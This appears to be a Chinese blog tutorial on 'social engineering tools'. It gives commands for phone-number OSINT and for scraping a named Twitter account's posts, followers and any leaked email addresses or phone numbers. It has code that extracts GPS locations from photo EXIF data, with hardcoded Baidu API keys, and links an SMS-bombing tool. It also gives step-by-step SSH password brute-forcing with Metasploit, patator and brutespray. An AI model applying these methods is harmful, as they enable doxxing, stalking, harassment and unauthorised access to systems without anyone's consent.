社工工具

阅读数:0次 2022-04-09

搜索手机号

PhoneInfoga引擎

部署方法

使用Docker拉取镜像

```bash
docker pull sundowndev/phoneinfoga:latest


- 通过8080端口映射，您可以访问本地的8080端口进入网页

  - ```bash
    docker run -it -p 8080:8080 sundowndev/phoneinfoga  serve -p 8080

使用方法

手机号寻找开源信息

Google hacking的语句搜索

收集国内手机号

记得+86

通过推特进行信息收集

工具安装

方法一

github下载

1
2
3

git clone --depth=1 https://github.com/twintproject/twint.git
cd twint
pip3 install . -r requirements.txt

方法二

安装twint模块

1	pip3 install --upgrade git+https://github.com/twintproject/twint.git@origin/master#egg=twint

部分运行出现报错，则需要修改token.py

具体每个人的环境不同（我的是在/usr/local/lib/python3.6/site-packages/twint/token.py下面）

import re
import time

import requests
import logging as logme


class TokenExpiryException(Exception):
    def __init__(self, msg):
        super().__init__(msg)


class RefreshTokenException(Exception):
    def __init__(self, msg):
        super().__init__(msg)


class Token:
    def __init__(self, config):
        self._session = requests.Session()
        self._session.headers.update({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'})
        self.config = config
        self._retries = 5
        self._timeout = 10
        self.url = 'https://twitter.com'

    def _request(self):
        for attempt in range(self._retries + 1):
            # The request is newly prepared on each retry because of potential cookie updates.
            req = self._session.prepare_request(requests.Request('GET', self.url))
            logme.debug(f'Retrieving {req.url}')
            try:
                r = self._session.send(req, allow_redirects=True, timeout=self._timeout)
            except requests.exceptions.RequestException as exc:
                if attempt < self._retries:
                    retrying = ', retrying'
                    level = logme.WARNING
                else:
                    retrying = ''
                    level = logme.ERROR
                logme.log(level, f'Error retrieving {req.url}: {exc!r}{retrying}')
            else:
                success, msg = (True, None)
                msg = f': {msg}' if msg else ''

                if success:
                    logme.debug(f'{req.url} retrieved successfully{msg}')
                    return r
            if attempt < self._retries:
                # TODO : might wanna tweak this back-off timer
                sleep_time = 2.0 * 2 ** attempt
                logme.info(f'Waiting {sleep_time:.0f} seconds')
                time.sleep(sleep_time)
        else:
            msg = f'{self._retries + 1} requests to {self.url} failed, giving up.'
            logme.fatal(msg)
            self.config.Guest_token = None
            raise RefreshTokenException(msg)

    def refresh(self):
        logme.debug('Retrieving guest token')
        res = self._request()
        match = re.search(r'\("gt=(\d+);', res.text)
        if match:
            logme.debug('Found guest token in HTML')
            self.config.Guest_token = str(match.group(1))
        else:
            headers = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0',
                'authority': 'api.twitter.com',
                'content-length': '0',
                'authorization': self.config.Bearer_token,
                'x-twitter-client-language': 'en',
                'x-csrf-token': res.cookies.get("ct0"),
                'x-twitter-active-user': 'yes',
                'content-type': 'application/x-www-form-urlencoded',
                'accept': '*/*',
                'sec-gpc': '1',
                'origin': 'https://twitter.com',
                'sec-fetch-site': 'same-site',
                'sec-fetch-mode': 'cors',
                'sec-fetch-dest': 'empty',
                'referer': 'https://twitter.com/',
                'accept-language': 'en-US',
            }
            self._session.headers.update(headers)
            req = self._session.prepare_request(requests.Request('POST', 'https://api.twitter.com/1.1/guest/activate.json'))
            res = self._session.send(req, allow_redirects=True, timeout=self._timeout)
            match = re.search(r'{"guest_token":"(\d+)"}', res.text)
            if match:
                logme.debug('Found guest token in JSON')
                self.config.Guest_token = str(match.group(1))
            else:
                self.config.Guest_token = None
                raise RefreshTokenException('Could not find the Guest token in JSON')

实战案例

我们先找到twitter的地址(https://twitter.com/BestfScarlett)
将BestfScarlett改成你要搜寻的用户名

收集一下发过的全部推特内容

```bash
twint -u BestfScarlett


  - ![image-20220409114926900](shegong-util/image-20220409114926900.png)

- 根据点赞数、评论、转发数筛选

  - 只看点赞数超过500的

    ![image-20220409115137784](shegong-util/image-20220409115137784.png)

    ```bash
    twint -u BestfScarlett --min-likes=500

只看评论超过10的

1	twint -u BestfScarlett --min-replies=10

只看转发量超过100的

1	twint -u BestfScarlett --min-retweets=100

根据时间维度筛选

2021年之前发过的内容
1
twint -u BestfScarlett --year 2021

某个日期后发送的内容

1	twint -u BestfScarlett --since 2019-4-26

某个时间点之后发送的内容

1	twint -u BestfScarlett --since "2019-04-26 20:30:15"

关键词索引

搜索twitter整个社交平台(Scarlett)
1
twint -s Scarlett
关键词配合twitter号索引,与美队相关的内容
1
twint -u BestfScarlett -s Captain
关键词配合认证twitter账户索引

搜索寡姐（Scarlett Johansson），而且来源要是认证账户的
1
twint -s "Scarlett Johansson" --verified
泄露手机号、邮件信息索引
- 检测邮件泄露的命令
  1
  twint -u BestfScarlett --email
- 检测手机号泄露的命令
  1
  twint -u BestfScarlett --phone
导出数据

导出数据只是命令中的一个附加参数，相当于之前我们的命令在后面加上-o相关的命令，也可以导出

（这里假定我们导出的文件名称为file）
- 导出txt格式 -o file.txt
- 导出csv格式 -o file.csv –csv
- 导出json格式 -o file.json –json
当然，这些都是简单的，如果你还想玩点更骚的，还可以直接写到数据库里
- 写入sqlite数据库中 –database tweets.db
- 写入es数据库中 -es localhost:9200
写到数据库中玩法就更多样了，你可以通过一些图表，来更清晰地展现这些用户画像，用户之间的关系以及发送推文的报表.
导出粉丝列表

看哪些用户关注了寡姐，可以通过下面的命令导出到Scarlett_followers.json文件中
1
twint -u Scarlett_Jo --followers -o Scarlett_followers.json --json

导出TA的关心用户

1	twint -u BestfScarlett --following --user-full -o Scarlett_folloing.json --json

导出最近900条推文

1	twint -u BestfScarlett --following --user-full -o Scarlett_latest_post.json --json

导出TA喜欢的文章

1	twint -u BestfScarlett --favorites -o Scarlett_favorites.json --json

通过照片得到经纬度

代码

Python

# pip install exifread
# pip install Requests

import requests
import exifread


class GetPhotoInfo:
    def __init__(self, photo):
        self.photo = photo
        # 百度地图ak  请替换为自己申请的ak
        self.ak = 'w5yCMHrlcHn2Er6WHcjvpHMpNOeYGIX7'
        self.location = self.get_photo_info()

    def get_photo_info(self, ):
        with open(self.photo, 'rb') as f:
            tags = exifread.process_file(f)
        try:
            # 打印照片其中一些信息
            print('拍摄时间：', tags['EXIF DateTimeOriginal'])
            print('照相机制造商：', tags['Image Make'])
            print('照相机型号：', tags['Image Model'])
            print('照片尺寸：', tags['EXIF ExifImageWidth'], tags['EXIF ExifImageLength'])
            # 纬度
            lat_ref = tags["GPS GPSLatitudeRef"].printable
            lat = tags["GPS GPSLatitude"].printable[1:-1].replace(" ", "").replace("/", ",").split(",")
            lat = float(lat[0]) + float(lat[1]) / 60 + float(lat[2]) / float(lat[3]) / 3600
            if lat_ref != "N":
                lat = lat * (-1)
            # 经度
            lon_ref = tags["GPS GPSLongitudeRef"].printable
            lon = tags["GPS GPSLongitude"].printable[1:-1].replace(" ", "").replace("/", ",").split(",")
            lon = float(lon[0]) + float(lon[1]) / 60 + float(lon[2]) / float(lon[3]) / 3600
            if lon_ref != "E":
                lon = lon * (-1)
        except KeyError:
            return "ERROR:请确保照片包含经纬度等EXIF信息。"
        else:
            print("经纬度：", lat, lon)
            return lat, lon

    def get_location(self):
        url = 'http://api.map.baidu.com/reverse_geocoding/v3/?ak={}&output=json' \
              '&coordtype=wgs84ll&location={},{}'.format(self.ak, *self.location)
        response = requests.get(url).json()
        status = response['status']
        if status == 0:
            address = response['result']['formatted_address']
            print('详细地址：', address)
        else:
            print('baidu_map error')


if __name__ == '__main__':
    Main = GetPhotoInfo('1.jpg') # 改地址
    Main.get_location()

Java

package com.easylinkin.bm.extractor;

import com.alibaba.fastjson.JSONObject;
import com.drew.imaging.ImageMetadataReader;
import com.drew.imaging.ImageProcessingException;
import com.drew.metadata.Directory;
import com.drew.metadata.Metadata;
import com.drew.metadata.Tag;
import com.easylinkin.bm.util.HttpUtils;
import lombok.extern.slf4j.Slf4j;

import java.io.File;
import java.io.IOException;

/**
 * @author zhengwen
 **/
@Slf4j
public class ImgTestCode {
    public static void main(String[] args) throws Exception {

        File file = new File("C:\\Users\\fancypig\\Desktop\\pic_location\\IMG_6623.jpg");
        readImageInfo(file);
    }

    /**
     * 提取照片里面的信息
     *
     * @param file 照片文件
     * @throws ImageProcessingException
     * @throws Exception
     */
    private static void readImageInfo(File file) throws ImageProcessingException, Exception {
        Metadata metadata = ImageMetadataReader.readMetadata(file);

        System.out.println("---打印全部详情---");
        for (Directory directory : metadata.getDirectories()) {
            for (Tag tag : directory.getTags()) {
                System.out.format("[%s] - %s = %s\n",
                        directory.getName(), tag.getTagName(), tag.getDescription());
            }
            if (directory.hasErrors()) {
                for (String error : directory.getErrors()) {
                    System.err.format("ERROR: %s", error);
                }
            }
        }

        System.out.println("--打印常用信息---");
        
        Double lat = null;
        Double lng = null;
        for (Directory directory : metadata.getDirectories()) {
            for (Tag tag : directory.getTags()) {
                String tagName = tag.getTagName();  //标签名
                String desc = tag.getDescription(); //标签信息
                if (tagName.equals("Image Height")) {
                    System.err.println("图片高度: " + desc);
                } else if (tagName.equals("Image Width")) {
                    System.err.println("图片宽度: " + desc);
                } else if (tagName.equals("Date/Time Original")) {
                    System.err.println("拍摄时间: " + desc);
                } else if (tagName.equals("GPS Latitude")) {
                    System.err.println("纬度 : " + desc);
                    System.err.println("纬度(度分秒格式) : " + pointToLatlong(desc));
                    lat = latLng2Decimal(desc);
                } else if (tagName.equals("GPS Longitude")) {
                    System.err.println("经度: " + desc);
                    System.err.println("经度(度分秒格式): " + pointToLatlong(desc));
                    lng = latLng2Decimal(desc);
                }
            }
        }
        System.err.println("--经纬度转地址--");
        //经纬度转地主使用百度api
        convertGpsToLoaction(lat, lng);


    }

    /**
     * 经纬度格式  转换为  度分秒格式 ,如果需要的话可以调用该方法进行转换
     *
     * @param point 坐标点
     * @return
     */
    public static String pointToLatlong(String point) {
        Double du = Double.parseDouble(point.substring(0, point.indexOf("°")).trim());
        Double fen = Double.parseDouble(point.substring(point.indexOf("°") + 1, point.indexOf("'")).trim());
        Double miao = Double.parseDouble(point.substring(point.indexOf("'") + 1, point.indexOf("\"")).trim());
        Double duStr = du + fen / 60 + miao / 60 / 60;
        return duStr.toString();
    }

    /***
     * 经纬度坐标格式转换（* °转十进制格式）
     * @param gps
     */
    public static double latLng2Decimal(String gps) {
        String a = gps.split("°")[0].replace(" ", "");
        String b = gps.split("°")[1].split("'")[0].replace(" ", "");
        String c = gps.split("°")[1].split("'")[1].replace(" ", "").replace("\"", "");
        double gps_dou = Double.parseDouble(a) + Double.parseDouble(b) / 60 + Double.parseDouble(c) / 60 / 60;
        return gps_dou;
    }

    /**
     * api_key：注册的百度api的key
     * coords：经纬度坐标
     * http://api.map.baidu.com/reverse_geocoding/v3/?ak="+api_key+"&output=json&coordtype=wgs84ll&location="+coords
     * <p>
     * 经纬度转地址信息
     *
     * @param gps_latitude  维度
     * @param gps_longitude 精度
     */
    private static void convertGpsToLoaction(double gps_latitude, double gps_longitude) throws IOException {
        String apiKey = "YNxcSCAphFvuPD4LwcgWXwC3SEZZc7Ra";

        String res = "";
        String url = "http://api.map.baidu.com/reverse_geocoding/v3/?ak=" + apiKey + "&output=json&coordtype=wgs84ll&location=" + (gps_latitude + "," + gps_longitude);
        System.err.println("【url】" + url);

        res = HttpUtils.httpGet(url);
        JSONObject object = JSONObject.parseObject(res);
        if (object.containsKey("result")) {
            JSONObject result = object.getJSONObject("result");
            if (result.containsKey("addressComponent")) {
                JSONObject address = object.getJSONObject("result").getJSONObject("addressComponent");
                System.err.println("拍摄地点：" + address.get("country") + " " + address.get("province") + " " + address.get("city") + " " + address.get("district") + " "
                        + address.get("street") + " " + result.get("formatted_address") + " " + result.get("business"));
            }
        }
    }

}

工具

在线经纬度转换 https://map.jiqrxx.com/jingweidu/

Exif查询大师 (小程序)

短信轰炸

https://github.com/TheSpeedX/TBomb

暴力猜解ssh

Metasploit渗透框架

输入msfconsole打开框架，然后搜索ssh暴力破解的模块

1 2	msfconsole search ssh_login

我们这里需要使用auxiliary/scanner/ssh/ssh_login模块

1	use auxiliary/scanner/ssh/ssh_login

然后输入下面的命令查看我们可以使用的参数

1	show options

我们这里可以使用RHOST来指定IP地址

1	set rhost 192.168.244.131

USER_FILE来指定我们的用户名字典

1	set USER_FILE user.txt

PASS_FILE指定密码字典

1	set PASS_FILE password.txt

设置每次破解的账户名和密码打印出来

1	set verbose yes

输入run开始运行

可以看到基本上密码失败的请求包和相应包长度均为100、132

直到最后找到密码，发现返回的加密包的长度(len)为168

patator

1	patator ssh_login host=192.168.244.131 user=FILE0 0=user.txt password=FILE1 1=password.txt

如果不确认的话，我们直接输入正确的用户名和密码进行暴力破解

我们可以发现返回的加密包长度(len)为48

BrutesPray

1 2	apt-get update apt-get install brutespray

扫描需要提前用nmap导出xml结果，才能使用，我们这里知道只需要扫描22端口就行了

1	sudo nmap -sS -p22 192.168.244.131 -oX ssh.xml

然后我们使用ssh.xml进行暴力破解

1	brutespray -t 1 -U user.txt -P password.txt -t 192.168.244.131 --file ssh.xml

这里看到最后一次是暴力破解成功了

发现返回的加密包长度也是656